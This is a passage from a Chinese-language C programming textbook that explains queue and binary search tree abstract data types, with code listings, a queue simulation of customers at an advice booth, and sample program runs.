指针设置为指向新节点。因为如果队列中只有一个节点,那么这个节点既是 1361 首节点也是尾节点。第二种情况是,如果函数不能为节点分配所需内存,则 必须执行一些动作。因为大多数情况下我们都使用小型队列,这种情况很少 发生,所以,如果程序运行的内存不足,我们只是通过函数终止程序。 EnQueue()的代码如下: bool EnQueue(Item item, Queue * pq) { Node * pnew; if (QueueIsFull(pq)) return false; pnew = (Node *)malloc( sizeof(Node)); if (pnew == NULL) { fprintf(stderr,"Unable to allocate memory!\n"); exit(1); } CopyToNode(item, pnew); pnew->next = NULL; if (QueueIsEmpty(pq)) pq->front = pnew;   /* 项位于队列首端    */ else 1362 pq->rear->next = pnew; /* 链接到队列尾端    */ pq->rear = pnew;      /* 记录队列尾端的位置  */ pq->items++;        /* 队列项数加1     */ return true; } CopyToNode()函数是静态函数,用于把项拷贝到节点中: static void CopyToNode(Item item, Node * pn) { pn->item = item; } 从队列的首端删除项,涉及以下几个步骤: (1)把项拷贝到给定的变量中; (2)释放空出的节点使用的内存空间; (3)重置首指针指向队列中的下一个项; (4)如果删除最后一项,把首指针和尾指针都重置为NULL; (5)项数减1。 下面的代码完成了这些步骤: bool DeQueue(Item * pitem, Queue * pq) { 1363 Node * pt; if (QueueIsEmpty(pq)) return false; CopyToItem(pq->front, pitem); pt = pq->front; pq->front = pq->front->next; free(pt); pq->items--; if (pq->items == 0) pq->rear = NULL; return true; } 关于指针要注意两点。第一,删除最后一项时,代码中并未显式设置 front指针为NULL,因为已经设置front指针指向被删除节点的next指针。如果 该节点不是最后一个节点,那么它的next指针就为NULL。第二,代码使用 临时指针(pt)储存待删除节点的位置。因为指向首节点的正式指针(pt- >front)被重置为指向下一个节点,所以如果没有临时指针,程序就不知道 该释放哪块内存。 我们使用DeQueue()函数清空队列。循环调用DeQueue()函数直到队列为 空: void EmptyTheQueue(Queue * pq) 1364 { Item dummy; while (!QueueIsEmpty(pq)) DeQueue(&dummy, pq); } 注意 保持纯正的ADT 定义ADT接口后,应该只使用接口函数处理数据类型。例如, Dequeue()依赖EnQueue()函数来正确设置指针和把rear节点的next指针设置为 NULL。如果在一个使用ADT的程序中,决定直接操控队列的某些部分,有 可能破坏接口包中函数之间的协作关系。 程序清单17.7演示了该接口中的所有函数,包括EnQueue()函数中用到的 CopyToItem()函数。 程序清单17.7 queue.c实现文件 /* queue.c -- Queue类型的实现 */ #include <stdio.h> #include <stdlib.h> #include "queue.h" /* 局部函数 */ static void CopyToNode(Item item, Node * pn); static void CopyToItem(Node * pn, Item * pi); 1365 void InitializeQueue(Queue * pq) { pq->front = pq->rear = NULL; pq->items = 0; } bool QueueIsFull(const Queue * pq) { return pq->items == MAXQUEUE; } bool QueueIsEmpty(const Queue * pq) { return pq->items == 0; } int QueueItemCount(const Queue * pq) { return pq->items; } bool EnQueue(Item item, Queue * pq) { 1366 Node * pnew; if (QueueIsFull(pq)) return false; pnew = (Node *) malloc(sizeof(Node)); if (pnew == NULL) { fprintf(stderr, "Unable to allocate memory!\n"); exit(1); } CopyToNode(item, pnew); pnew->next = NULL; if (QueueIsEmpty(pq)) pq->front = pnew;     /* 项位于队列的首端   */ else pq->rear->next = pnew;   /* 链接到队列的尾端   */ pq->rear = pnew;        /* 记录队列尾端的位置  */ pq->items++;          /* 队列项数加1     */ return true; } 1367 bool DeQueue(Item * pitem, Queue * pq) { Node * pt; if (QueueIsEmpty(pq)) return false; CopyToItem(pq->front, pitem); pt = pq->front; pq->front = pq->front->next; free(pt); pq->items--; if (pq->items == 0) pq->rear = NULL; return true; } /* 清空队列 */ void EmptyTheQueue(Queue * pq) { Item dummy; while (!QueueIsEmpty(pq)) 1368 DeQueue(&dummy, pq); } /* 局部函数 */ static void CopyToNode(Item item, Node * pn) { pn->item = item; } static void CopyToItem(Node * pn, Item * pi) { *pi = pn->item; } 17.4.4 测试队列 在重要程序中使用一个新的设计(如,队列包)之前,应该先测试该设 计。测试的一种方法是,编写一个小程序。这样的程序称为驱动程序 (driver),其唯一的用途是进行测试。例如,程序清单17.8使用一个添加 和删除整数的队列。在运行该程序之前,要确保queue.h中包含下面这行代 码: typedef int item; 记住,还必须链接queue.c和use_q.c。 程序清单17.8 use_q.c程序 1369 /* use_q.c -- 驱动程序测试 Queue 接口 */ /* 与 queue.c 一起编译          */ #include <stdio.h> #include "queue.h" /* 定义Queue、Item  */ int main(void) { Queue line; Item temp; char ch; InitializeQueue(&line); puts("Testing the Queue interface. Type a to add a value,"); puts("type d to delete a value, and type q to quit."); while ((ch = getchar()) != 'q') { if (ch != 'a' && ch != 'd') /* 忽略其他输出 */ continue; if (ch == 'a') { printf("Integer to add: "); 1370 scanf("%d", &temp); if (!QueueIsFull(&line)) { printf("Putting %d into queue\n", temp); EnQueue(temp, &line); } else puts("Queue is full!"); } else { if (QueueIsEmpty(&line)) puts("Nothing to delete!"); else { DeQueue(&temp, &line); printf("Removing %d from queue\n", temp); } } 1371 printf("%d items in queue\n", QueueItemCount(&line)); puts("Type a to add, d to delete, q to quit:"); } EmptyTheQueue(&line); puts("Bye!"); return 0; } 下面是一个运行示例。除了这样测试,还应该测试当队列已满后,实现 是否能正常运行。 Testing the Queue interface. Type a to add a value, type d to delete a value, and type q to quit. a Integer to add: 40 Putting 40 into queue 1 items in queue Type a to add, d to delete, q to quit: a Integer to add: 20 Putting 20 into queue 1372 2 items in queue Type a to add, d to delete, q to quit: a Integer to add: 55 Putting 55 into queue 3 items in queue Type a to add, d to delete, q to quit: d Removing 40 from queue 2 items in queue Type a to add, d to delete, q to quit: d Removing 20 from queue 1 items in queue Type a to add, d to delete, q to quit: d Removing 55 from queue 0 items in queue Type a to add, d to delete, q to quit: 1373 d Nothing to delete! 0 items in queue Type a to add, d to delete, q to quit: q Bye! 1374 17.5 用队列进行模拟 经过测试,队列没问题。现在,我们用它来做一些有趣的事情。许多现 实生活的情形都涉及队列。例如,在银行或超市的顾客队列、机场的飞机队 列、多任务计算机系统中的任务队列等。我们可以用队列包来模拟这些情 形。 假设Sigmund Landers在商业街设置了一个提供建议的摊位。顾客可以购 买1分钟、2分钟或3分钟的建议。为确保交通畅通,商业街规定每个摊位前 排队等待的顾客最多为10人(相当于程序中的最大队列长度)。假设顾客都 是随机出现的,并且他们花在咨询上的时间也是随机选择的(1分钟、2分 钟、3分钟)。那么 Sigmund 平均每小时要接待多少名顾客?每位顾客平均 要花多长时间?排队等待的顾客平均有多少人?队列模拟能回答类似的问 题。 首先,要确定在队列中放什么。可以根据顾客加入队列的时间和顾客咨 询时花费的时间来描述每一位顾客。因此,可以这样定义Item类型。 typedef struct item { long arrive;   /* 一位顾客加入队列的时间 */ int processtime; /* 该顾客咨询时花费的时间 */ } Item; 要用队列包来处理这个结构,必须用typedef定义的Item替换上一个示例 的int类型。这样做就不用担心队列的具体工作机制,可以集中精力分析实际 问题,即模拟咨询Sigmund的顾客队列。 这里有一种方法,让时间以1分钟为单位递增。每递增1分钟,就检查是 否有新顾客到来。如果有一位顾客且队列未满,将该顾客添加到队列中。这 1375 涉及把顾客到来的时间和顾客所需的咨询时间记录在Item类型的结构中,然 后在队列中添加该项。然而,如果队列已满,就让这位顾客离开。为了做统 计,要记录顾客的总数和被拒顾客(队列已满不能加入队列的人)的总数。 接下来,处理队列的首端。也就是说,如果队列不为空且前面的顾客没 有在咨询 Sigmund,则删除队列首端的项。记住,该项中储存着这位顾客加 入队列的时间,把该时间与当前时间作比较,就可得出该顾客在队列中等待 的时间。该项还储存着这位顾客需要咨询的分钟数,即还要咨询 Sigmund多 长时间。因此还要用一个变量储存这个时长。如果Sigmund 正忙,则不用让 任何人离开队列。尽管如此,记录等待时间的变量应该递减1。 核心代码类似下面这样,每一轮迭代对应1分钟的行为: for (cycle = 0; cycle < cyclelimit; cycle++) { if (newcustomer(min_per_cust)) { if (QueueIsFull(&line)) turnaways++; else { customers++; temp = customertime(cycle); EnQueue(temp, &line); } 1376 } if (wait_time <= 0 && !QueueIsEmpty(&line)) { DeQueue(&temp, &line); wait_time = temp.processtime; line_wait += cycle - temp.arrive; served++; } if (wait_time > 0) wait_time––; sum_line += QueueItemCount(&line); } 注意,时间的表示比较粗糙(1分钟),所以一小时最多60位顾客。下 面是一些变量和函数的含义。 min_per_cus是顾客到达的平均间隔时间。 newcustomer()使用C的rand()函数确定在特定时间内是否有顾客到来。 turnaways是被拒绝的顾客数量。 customers是加入队列的顾客数量。 temp是表示新顾客的Item类型变量。 1377 customertime()设置temp结构中的arrive和processtime成员。 wait_time是Sigmund完成当前顾客的咨询还需多长时间。 line_wait是到目前为止队列中所有顾客的等待总时间。 served是咨询过Sigmund的顾客数量。 sum_line是到目前为止统计的队列长度。 如果到处都是malloc()、free()和指向节点的指针,整个程序代码会非常 混乱和晦涩。队列包让你把注意力集中在模拟问题上,而不是编程细节上。 程序清单 17.9 演示了模拟商业街咨询摊位队列的完整代码。根据第 12 章介绍的方法,使用标准函数rand()、srand()和 time()来产生随机数。另外要 特别注意,必须用下面的代码更新 queue.h 中的Item,该程序才能正常工 作: typedef struct item { long arrive;    //一位顾客加入队列的时间 int processtime;  //该顾客咨询时花费的时间 } Item; 记住,还要把mall.c和queue.c一起链接。 程序清单17.9 mall.c程序 // mall.c -- 使用 Queue 接口 // 和 queue.c 一起编译 1378 #include <stdio.h> #include <stdlib.h>       // 提供 rand() 和 srand() 的原型 #include <time.h>         // 提供 time() 的原型 #include "queue.h"        // 更改 Item 的 typedef #define MIN_PER_HR 60.0 bool newcustomer(double x);   // 是否有新顾客到来? Item customertime(long when);  // 设置顾客参数 int main(void) { Queue line; Item temp;          // 新的顾客数据 int hours;          // 模拟的小时数 int perhour;         // 每小时平均多少位顾客 long cycle, cyclelimit;   // 循环计数器、计数器的上限 long turnaways = 0;     // 因队列已满被拒的顾客数量 long customers = 0;     // 加入队列的顾客数量 long served = 0;       // 在模拟期间咨询过Sigmund的顾客数量 long sum_line = 0;      // 累计的队列总长 int wait_time = 0;      // 从当前到Sigmund空闲所需的时间 1379 double min_per_cust;    // 顾客到来的平均时间 long line_wait = 0;     // 队列累计的等待时间 InitializeQueue(&line); srand((unsigned int) time(0)); // rand() 随机初始化 puts("Case Study: Sigmund Lander's Advice Booth"); puts("Enter the number of simulation hours:"); scanf("%d", &hours); cyclelimit = MIN_PER_HR * hours; puts("Enter the average number of customers per hour:"); scanf("%d", &perhour); min_per_cust = MIN_PER_HR / perhour; for (cycle = 0; cycle < cyclelimit; cycle++) { if (newcustomer(min_per_cust)) { if (QueueIsFull(&line)) turnaways++; else { 1380 customers++; temp = customertime(cycle); EnQueue(temp, &line); } } if (wait_time <= 0 && !QueueIsEmpty(&line)) { DeQueue(&temp, &line); wait_time = temp.processtime; line_wait += cycle - temp.arrive; served++; } if (wait_time > 0) wait_time--; sum_line += QueueItemCount(&line); } if (customers > 0) { printf("customers accepted: %ld\n", customers); 1381 printf("  customers served: %ld\n", served); printf("     turnaways: %ld\n", turnaways); printf("average queue size: %.2f\n", (double) sum_line / cyclelimit); printf(" average wait time: %.2f minutes\n", (double) line_wait / served); } else puts("No customers!"); EmptyTheQueue(&line); puts("Bye!"); return 0; } // x是顾客到来的平均时间(单位:分钟) // 如果1分钟内有顾客到来,则返回true bool newcustomer(double x) { if (rand() * x / RAND_MAX < 1) return true; 1382 else return false; } // when是顾客到来的时间 // 该函数返回一个Item结构,该顾客到达的时间设置为when, // 咨询时间设置为1~3的随机值 Item customertime(long when) { Item cust; cust.processtime = rand() % 3 + 1; cust.arrive = when; return cust; } 该程序允许用户指定模拟运行的小时数和每小时平均有多少位顾客。模 拟时间较长得出的值较为平均,模拟时间较短得出的值随时间的变化而随机 变化。下面的运行示例解释了这一点(先保持每小时的顾客平均数量不 变)。注意,在模拟80小时和800小时的情况下,平均队伍长度和等待时间 基本相同。但是,在模拟 1 小时的情况下这两个量差别很大,而且与长时间 模拟的情况差别也很大。这是因为小数量的统计样本往往更容易受相对变化 的影响。 Case Study: Sigmund Lander's Advice Booth 1383 Enter the number of simulation hours: 80 Enter the average number of customers per hour: 20 customers accepted: 1633 customers served: 1633 turnaways: 0 average queue size: 0.46 average wait time: 1.35 minutes Case Study: Sigmund Lander's Advice Booth Enter the number of simulation hours: 800 Enter the average number of customers per hour: 20 customers accepted: 16020 customers served: 16019 turnaways: 0 average queue size: 0.44 average wait time: 1.32 minutes 1384 Case Study: Sigmund Lander's Advice Booth Enter the number of simulation hours: 1 Enter the average number of customers per hour: 20 customers accepted: 20 customers served: 20 turnaways: 0 average queue size: 0.23 average wait time: 0.70 minutes Case Study: Sigmund Lander's Advice Booth Enter the number of simulation hours: 1 Enter the average number of customers per hour: 20 customers accepted: 22 customers served: 22 turnaways: 0 average queue size: 0.75 1385 average wait time: 2.05 minutes 然后保持模拟的时间不变,改变每小时的顾客平均数量: Case Study: Sigmund Lander's Advice Booth Enter the number of simulation hours: 80 Enter the average number of customers per hour: 25 customers accepted: 1960 customers served: 1959 turnaways: 3 average queue size: 1.43 average wait time: 3.50 minutes Case Study: Sigmund Lander's Advice Booth Enter the number of simulation hours: 80 Enter the average number of customers per hour: 30 customers accepted: 2376 customers served: 2373 1386 turnaways: 94 average queue size: 5.85 average wait time: 11.83 minutes 注意,随着每小时顾客平均数量的增加,顾客的平均等待时间迅速增 加。在每小时20位顾客(80小时模拟时间)的情况下,每位顾客的平均等待 时间是1.35分钟;在每小时25位顾客的情况下,平均等待时间增加至3.50分 钟;在每小时30位顾客的情况下,该数值攀升至11.83分钟。而且,这3种情 况下被拒顾客分别从0位增加至3位最后陡增至94位。Sigmund可以根据程序 模拟的结果决定是否要增加一个摊位。 1387 17.6 链表和数组 许多编程问题,如创建一个简单链表或队列,都可以用链表(指的是动 态分配结构的序列链)或数组来处理。每种形式都有其优缺点,所以要根据 具体问题的要求来决定选择哪一种形式。表17.1总结了链表和数组的性质。 表17.1 比较数组和链表 接下来,详细分析插入和删除元素的过程。在数组中插入元素,必须移 动其他元素腾出空位插入新元素,如图17.9所示。新插入的元素离数组开头 越近,要被移动的元素越多。然而,在链表中插入节点,只需给两个指针赋 值,如图17.10所示。类似地,从数组中删除一个元素,也要移动许多相关 的元素。但是从链表中删除节点,只需重新设置一个指针并释放被删除节点 占用的内存即可。 1388 图17.9 在数组中插入一个元素 1389 图17.10 在链表中插入一个元素 接下来,考虑如何访问元素。对数组而言,可以使用数组下标直接访问 该数组中的任意元素,这叫做随机访问(random access)。对链表而言,必 须从链表首节点开始,逐个节点移动到要访问的节点,这叫做顺序访问 (sequential access)。当然,也可以顺序访问数组。只需按顺序递增数组下 标即可。在某些情况下,顺序访问足够了。例如,显示链表中的每一项,顺 序访问就不错。其他情况用随机访问更合适。 假设要查找链表中的特定项。一种算法是从列表的开头开始按顺序查 找,这叫做顺序查找(sequential search)。如果项并未按某种顺序排列,则 只能顺序查找。如果待查找的项不在链表里,必须查找完所有的项才知道该 项不在链表中(在这种情况下可以使用并发编程,同时查找列表中的不同部 分)。 1390 我们可以先排序列表,以改进顺序查找。这样,就不必查找排在待查找 项后面的项。例如,假设在一个按字母排序的列表中查找Susan。从开头开 始查找每一项,直到Sylvia都没有查找到Susan。这时就可以退出查找,因为 如果Susan在列表中,应该排在Sylvia前面。平均下来,这种方法查找不在列 表中的项的时间减半。 对于一个排序的列表,用二分查找(binary search)比顺序查找好得 多。下面分析二分查找的原理。首先,把待查找的项称为目标项,而且假设 列表中的各项按字母排序。然后,比较列表的中间项和目标项。如果两者相 等,查找结束;假设目标项在列表中,如果中间项排在目标项前面,则目标 项一定在后半部分项中;如果中间项在目标项后面,则目标项一定在前半部 分项中。无论哪种情况,两项比较的结果都确定了下次查找的范围只有列表 的一半。接着,继续使用这种方法,把需要查找的剩下一半的中间项与目标 项比较。同样,这种方法会确定下一次查找的范围是当前查找范围的一半。 以此类推,直到找到目标项或最终发现列表中没有目标项(见图17.11)。 这种方法非常有效率。假如有127个项,顺序查找平均要进行64次比较才能 找到目标项或发现不在其中。但是二分查找最多只用进行7次比较。第1次比 较剩下63项进行比较,第2次比较剩下31项进行比较,以此类推,第6次剩下 最后1项进行比较,第7次比较确定剩下的这个项是否是目标项。一般而言, n 次比较能处理有 2n-1 个元素的数组。所以项数越多,越能体现二分查找的 优势。 1391 1392 图17.11 用二分查找法查找Susan 用数组实现二分查找很简单,因为可以使用数组下标确定数组中任意部 分的中点。只要把数组的首元素和尾元素的索引相加,得到的和再除以2 即 可。例如,内含100 个元素的数组,首元素下标是0,尾元素下标是99,那 么用于首次比较的中间项的下标应为(0+99)/2,得49(整数除法)。如果比 较的结果是下标为49的元素在目标项的后面,那么目标项的下标应在0~48 的范围内。所以,第2次比较的中间项的下标应为(0+48)/2,得24。如果中 间项与目标项的比较结果是,中间项在目标项前面,那么第3次比较的中间 项下标应为(25+48)/2,得 36。这体现了随机访问的特性,可以从一个位置 跳至另一个位置,不用一次访问两位置之间的项。但是,链表只支持顺序访 问,不提供跳至中间节点的方法。所以在链表中不能使用二分查找。 如前所述,选择何种数据类型取决于具体的问题。如果因频繁地插入和 删除项导致经常调整大小,而且不需要经常查找,选择链表会更好。如果只 是偶尔插入或删除项,但是经常进行查找,使用数组会更好。 如果需要一种既支持频繁插入和删除项又支持频繁查找的数据形式,数 组和链表都无法胜任,怎么办?这种情况下应该选择二叉查找树。 1393 17.7 二叉查找树 二叉查找树是一种结合了二分查找策略的链接结构。二叉树的每个节点 都包含一个项和两个指向其他节点(称为子节点)的指针。图17.12演示了 二叉查找树中的节点是如何链接的。二叉树中的每个节点都包含两个子节点 ——左节点和右节点,其顺序按照如下规定确定:左节点的项在父节点的项 前面,右节点的项在父节点的项后面。这种关系存在于每个有子节点的节点 中。进一步而言,所有可以追溯其祖先回到一个父节点的左节点的项,都在 该父节点项的前面;所有以一个父节点的右节点为祖先的项,都在该父节点 项的后面。图17.12中的树以这种方式储存单词。有趣的是,与植物学的树 相反,该树的顶部被称为根(root)。树具有分层组织,所以以这种方式储 存的数据也以等级或层次组织。一般而言,每级都有上一级和下一级。如果 二叉树是满的,那么每一级的节点数都是上一级节点数的两倍。 图17.12 一个从存储单词的二叉树 二叉查找树中的每个节点是其后代节点的根,该节点与其后代节点构成 称了一个子树(subtree)。如图 17.12 所示,包含单词fate、carpet和llama的 1394 节点构成了整个二叉树的左子树,而单词 voyage是style-plenum-voyage子树 的右子树。 假设要在二叉树中查找一个项(即目标项)。如果目标项在根节点项的 前面,则只需查找左子树;如果目标项在根节点项的后面,则只需查找右子 树。因此,每次比较就排除半个树。假设查找左子树,这意味着目标项与左 子节点项比较。如果目标项在左子节点项的前面,则只需查找其后代节点的 左半部分,以此类推。与二分查找类似,每次比较都能排除一半的可能匹配 项。 我们用这种方法来查找puppy是否在图17.12的二叉树中。比较puppy和 melon(根节点项),如果puppy在该树中,一定在右子树中。因此,在右子 树中比较puppy和style,发现puppy在style前面,所以必须链接到其左节点。 然后发现该节点是plenum,在puppy前面。现在要向下链接到该节点的右子 节点,但是没有右子节点了。所以经过3次比较后发现puppy不在该树中。 二叉查找树在链式结构中结合了二分查找的效率。但是,这样编程的代 价是构建一个二叉树比创建一个链表更复杂。下面我们在下一个ADT项目中 创建一个二叉树。 17.7.1 二叉树ADT 和前面一样,先从概括地定义二叉树开始。该定义假设树不包含相同的 项。许多操作与链表相同,区别在于数据层次的安排。下面建立一个非正式 的树定义: 类型名:    二叉查找树 类型属性:    二叉树要么是空节点的集合(空树),要么是有一 个根节点的节点集合 每个节点都有两个子树,叫做左子树和右子树 每个子树本身也是一个二叉树,也有可能是空树 1395 二叉查找树是一个有序的二叉树,每个节点包含一个项, 左子树的所有项都在根节点项的前面,右子树的所有项都在根节点项的 后面 类型操作:    初始化树为空 确定树是否为空 确定树是否已满 确定树中的项数 在树中添加一个项 在树中删除一个项 在树中查找一个项 在树中访问一个项 清空树 17.7.2 二叉查找树接口 原则上,可以用多种方法实现二叉查找树,甚至可以通过操控数组下标 用数组来实现。但是,实现二叉查找树最直接的方法是通过指针动态分配链 式节点。因此我们这样定义: typedef SOMETHING Item; typedef struct trnode { Item item; 1396 struct trnode * left; struct trnode * right; } Trn; typedef struct tree { Trnode * root; int size; } Tree; 每个节点包含一个项、一个指向左子节点的指针和一个指向右子节点的 指针。可以把 Tree 定义为指向 Trnode 的指针类型,因为只需要知道根节点 的位置就可访问整个树。然而,使用有成员大小的结构能很方便地记录树的 大小。 我们要开发一个维护 Nerfville 宠物俱乐部的花名册,每一项都包含宠 物名和宠物的种类。程序清单17.10就是该花名册的接口。我们把树的大小 限制为10,较小的树便于在树已满时测试程序的行为是否正确。当然,你也 可以把MAXITEMS设置为更大的值。 程序清单17.10 tree.h接口头文件 /* tree.h -- 二叉查找数     */ /*      树种不允许有重复的项 */ #ifndef _TREE_H_ #define _TREE_H_ 1397 #include <stdbool.h> /* 根据具体情况重新定义 Item */ #define SLEN 20 typedef struct item { char petname[SLEN]; char petkind[SLEN]; } Item; #define MAXITEMS 10 typedef struct trnode { Item item; struct trnode * left;   /* 指向左分支的指针 */ struct trnode * right; /* 指向右分支的指针 */ } Trnode; typedef struct tree { Trnode * root;/* 指向根节点的指针     */ int size;   /* 树的项数         */ 1398 } Tree; /* 函数原型 */ /* 操作:   把树初始化为空*/ /* 前提条件:  ptree指向一个树   */ /* 后置条件:  树被初始化为空  */ void InitializeTree(Tree * ptree); /* 操作:   确定树是否为空            */ /* 前提条件:  ptree指向一个树           */ /* 后置条件:  如果树为空,该函数返回true      */ /*        否则,返回false         */ bool TreeIsEmpty(const Tree * ptree); /* 操作:   确定树是否已满            */ /* 前提条件:  ptree指向一个树           */ /* 后置条件:  如果树已满,该函数返回true      */ /*        否则,返回false         */ bool TreeIsFull(const Tree * ptree); /* 操作:   确定树的项数             */ /* 前提条件:  ptree指向一个树           */ /* 后置条件:  返回树的项数             */ 1399 int TreeItemCount(const Tree * ptree); /* 操作:   在树中添加一个项           */ /* 前提条件:  pi是待添加项的地址          */ /*        ptree指向一个已初始化的树    */ /* 后置条件:  如果可以添加,该函数将在树中添加一个项  */ /*        并返回true;否则,返回false   */ bool AddItem(const Item * pi, Tree * ptree); /* 操作:   在树中查找一个项           */ /* 前提条件:  pi指向一个项            */ /*        ptree指向一个已初始化的树    */ /* 后置条件:  如果在树中添加一个项,该函数返回true  */ /*        否则,返回false         */ bool InTree(const Item * pi, const Tree * ptree); /* 操作:   从树中删除一个项           */ /* 前提条件:  pi是删除项的地址           */ /*        ptree指向一个已初始化的树    */ /* 后置条件:  如果从树中成功删除一个项,该函数返回true*/ /*        否则,返回false         */ bool DeleteItem(const Item * pi, Tree * ptree); 1400 /* 操作:   把函数应用于树中的每一项        */ /* 前提条件:  ptree指向一个树           */ /*        pfun指向一个函数,       */ /*        该函数接受一个Item类型的参数,并无返回值*/ /* 后置条件:  pfun指向的这个函数为树中的每一项执行一次*/ void Traverse(const Tree * ptree, void(*pfun)(Item item)); /* 操作:   删除树中的所有内容          */ /* 前提条件:  ptree指向一个已初始化的树       */ /* 后置条件:  树为空               */ void DeleteAll(Tree * ptree); #endif 17.7.3 二叉树的实现 接下来,我们要实现tree.h中的每个函数。InitializeTree()、 EmptyTree()、FullTree()和TreeItems()函数都很简单,与链表ADT、队列ADT 类似,所以下面着重讲解其他函数。 1.添加项 在树中添加一个项,首先要检查该树是否有空间放得下一个项。由于我 们定义二叉树时规定其中的项不能重复,所以接下来要检查树中是否有该 项。通过这两步检查后,便可创建一个新节点,把待添加项拷贝到该节点 中,并设置节点的左指针和右指针都为NULL。这表明该节点没有子节点。 然后,更新Tree结构的 size 成员,统计新增了一项。接下来,必须找出应该 把这个新节点放在树中的哪个位置。如果树为空,则应设置根节点指针指向 1401 该新节点。否则,遍历树找到合适的位置放置该节点。AddItem()函数就根 据这个思路来实现,并把一些工作交给几个尚未定义的函数:SeekItem()、 MakeNode()和AddNode()。 bool AddItem(const Item * pi, Tree * ptree) { Trnode * new_node; if (TreeIsFull(ptree)) { fprintf(stderr, "Tree is full\n"); return false;     /* 提前返回  */ } if (SeekItem(pi, ptree).child != NULL) { fprintf(stderr, "Attempted to add duplicate item\n"); return false;     /* 提前返回  */ } new_node = MakeNode(pi);  /* 指向新节点 */ if (new_node == NULL) { fprintf(stderr, "Couldn't create node\n"); 1402 return false;     /* 提前返回  */ } /* 成功创建了一个新节点 */ ptree->size++; if (ptree->root == NULL)      /* 情况1:树为空    */ ptree->root = new_node;     /* 新节点是根节点    */ else                /* 情况2:树不为空   */ AddNode(new_node, ptree->root);/* 在树中添加一个节点*/ return true; /* 成功返回 */ } SeekItem()、MakeNode()和 AddNode()函数不是 Tree 类型公共接口的一 部分。它们是隐藏在tree.c文件中的静态函数,处理实现的细节(如节点、 指针和结构),不属于公共接口。 MakeNode()函数相当简单,它处理动态内存分配和初始化节点。该函 数的参数是指向新项的指针,其返回值是指向新节点的指针。如果 malloc() 无法分配所需的内存,则返回空指针。只有成功分配了内存,MakeNode() 函数才会初始化新节点。下面是MakeNode()的代码: static Trnode * MakeNode(const Item * pi) { Trnode * new_node; new_node = (Trnode *) malloc(sizeof(Trnode)); 1403 if (new_node != NULL) { new_node->item = *pi; new_node->left = NULL; new_node->right = NULL; } return new_node; } AddNode()函数是二叉查找树包中最麻烦的第2个函数。它必须确定新 节点的位置,然后添加新节点。具体来说,该函数要比较新项和根项,以确 定应该把新项放在左子树还是右子树中。如果新项是一个数字,则使用<和 >进行比较;如果新项是一个字符串,则使用strcmp()函数来比较。但是,该 项是内含两个字符串的结构,所以,必须自定义用于比较的函数。如果新项 应放在左子树中,ToLeft()函数(稍后定义)返回true;如果新项应放在右子 树中,ToRight()函数(稍后定义)返回true。这两个函数分别相当于<和>。 假设把新项放在左子树中。如果左子树为空,AddNode()函数只需让左子节 点指针指向新项即可。如果左子树不为空怎么办?此时,AddNode()函数应 该把新项和左子节点中的项做比较,以确定新项应该放在该子节点的左子树 还是右子树。这个过程一直持续到函数发现一个空子树为止,并在此此处添 加新节点。递归是一种实现这种查找过程的方法,即把AddNode()函数应用 于子节点,而不是根节点。当左子树或右子树为空时,即当root->left或root- >right为NULL时,函数的递归调用序列结束。记住,root是指向当前子树顶 部的指针,所以每次递归调用它都指向一个新的下一级子树(递归详见第9 章)。 static void AddNode(Trnode * new_node, Trnode * root) 1404 { if (ToLeft(&new_node->item, &root->item)) { if (root->left == NULL)       /* 空子树 */ root->left = new_node;     /* 所以,在此处添加节点 */ else AddNode(new_node, root->left); /* 否则,处理该子树*/ } else if (ToRight(&new_node->item, &root->item)) { if (root->right == NULL) root->right = new_node; else AddNode(new_node, root->right); } else                  /* 不应含有重复的项 */ { fprintf(stderr, "location error in AddNode()\n"); exit(1); 1405 } } ToLeft()和ToRight()函数依赖于Item类型的性质。Nerfville宠物俱乐部的 成员名按字母排序。如果两个宠物名相同,按其种类排序。如果种类也相 同,这两项属于重复项,根据该二叉树的定义,这是不允许的。回忆一下, 如果标准C库函数strcmp()中的第1个参数表示的字符串在第2个参数表示的字 符串前面,该函数则返回负数;如果两个字符串相同,该函数则返回0;如 果第1个字符串在第2个字符串后面,该函数则返回正数。ToRight()函数的实 现代码与该函数类似。通过这两个函数完成比较,而不是直接在AddNode() 函数中直接比较,这样的代码更容易适应新的要求。当需要比较不同的数据 形式时,就不必重写整个AddNode()函数,只需重写Toleft()和ToRight()即 可。 static bool ToLeft(const Item * i1, const Item * i2) { int comp1; if ((comp1 = strcmp(i1->petname, i2->petname)) < 0) return true; else if (comp1 == 0 && strcmp(i1->petkind, i2->petkind) < 0) return true; else return false; 1406 } 2.查找项 3个接口函数都要在树中查找特定项:AddItem()、InItem()和 DeleteItem()。这些函数的实现中使用SeekItem()函数进行查找。DeleteItem() 函数有一个额外的要求:该函数要知道待删除项的父节点,以便在删除子节 点后更新父节点指向子节点的指针。因此,我们设计SeekItem()函数返回的 结构包含两个指针:一个指针指向包含项的节点(如果未找到指定项则为 NULL);一个指针指向父节点(如果该节点为根节点,即没有父节点,则 为NULL)。这个结构类型的定义如下: typedef struct pair { Trnode * parent; Trnode * child; } Pair; SeekItem()函数可以用递归的方式实现。但是,为了给读者介绍更多编 程技巧,我们这次使用while循环处理树中从上到下的查找。和AddNode()一 样,SeekItem()也使用ToLeft()和ToRight()在树中导航。开始时,SeekItem()设 置look.child指针指向该树的根节点,然后沿着目标项应在的路径重置 look.child指向后续的子树。同时,设置look.parent指向后续的父节点。如果 没有找到匹配的项, look.child则被设置为NULL。如果在根节点找到匹配的 项,则设置look.parent为NULL,因为根节点没有父节点。下面是SeekItem() 函数的实现代码: static Pair SeekItem(const Item * pi, const Tree * ptree) { Pair look; 1407 look.parent = NULL; look.child = ptree->root; if (look.child == NULL) return look; /* 提前退出 */ while (look.child != NULL) { if (ToLeft(pi, &(look.child->item))) { look.parent = look.child; look.child = look.child->left; } else if (ToRight(pi, &(look.child->item))) { look.parent = look.child; look.child = look.child->right; } else     /* 如果前两种情况都不满足,则必定是相等的情况 */ break;    /* look.child 目标项的节点 */ } 1408 return look;   /* 成功返回 */ } 注意,如果 SeekItem()函数返回一个结构,那么该函数可以与结构成员 运算符一起使用。例如, AddItem()函数中有如下的代码: if (SeekItem(pi, ptree).child != NULL) 有了SeekItem()函数后,编写InTree()公共接口函数就很简单了: bool InTree(const Item * pi, const Tree * ptree) { return (SeekItem(pi, ptree).child == NULL) ? false : true; } 3.考虑删除项 删除项是最复杂的任务,因为必须重新连接剩余的子树形成有效的树。 在准备编写这部分代码之前,必须明确需要做什么。 图17.13演示了最简单的情况。待删除的节点没有子节点,这样的节点 被称为叶节点(leaf)。这种情况只需把父节点中的指针重置为NULL,并使 用free()函数释放已删除节点所占用的内存。 1409 图17.13 删除一个叶节点 删除带有一个子节点的情况比较复杂。删除该节点会导致其子树与其他 